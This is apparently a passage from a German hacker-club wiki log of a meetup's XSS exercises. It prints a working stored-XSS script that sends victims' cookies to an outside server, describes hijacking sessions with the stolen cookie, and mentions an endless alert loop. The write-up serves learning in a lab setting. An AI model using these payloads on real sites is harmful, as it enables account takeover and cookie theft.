<nowiki><script> type="text/javascript">alert("Achtung hier wird eine XSS Angriff durchgeführt");</script></nowiki> <br />
was dazu führt, das auf der ausgebenden Seite eine Meldung mit eingegebenen Text erschien. Kaputmachen konnte man hier also noch nichts, es sei denn den eigenen Rechner.<br />
<br />
Das zweite Hackit war ein wenig interessanter. Hier bestand die Möglichkeit sich mit Name und Kennwort anzumelden und dann über ein Nachrichten System Meldungen an andere Mitlgieder zu senden. Diese Meldungen konnten natürlich JavaScript beinhalten, sodass wir damit anfangen konnten die Cookies (KEEEKSE!!! omnomnom) anderer Nutzer zu klauen.<br />
<nowiki><script>document.write('<img src="http://cinsects.de/cookie?' +document.cookie+'">');</script></nowiki><br />
Mit diesem Script konnten wir den Cookie desjenigen auslesen, der die Nachricht bekommen hat und haben diesen in eine nicht existierende Datei auf einem Server für den wir Rechte haben geschickt. In der Fehlerkonsole dieses Servers wurde der Coockie nun angezeigt, und musste von uns nur noch als eigener Cookie in FF eingelesen werden. <br />
<br />
Natürlich war auch viel nasty shit möglich, wie aufpoppende Meldungen in einer while Schleife mit 1=1 als Bedingung, sodass der Brwoser neu gestartet werden musste. <br />
<br />
== Statistik ==<br />
<br />
Anzahl der anwesenden Personen: Start(8) Ende(9)<br />
L33tness-Faktor der Kekse: 100%<br />
<br />
== Themen für das nächste mal ==<br />
<br />
FIXME<br />
und daran zu denken, jemanden zu bestimmen, der Kekse mitbringt.</div>
0funke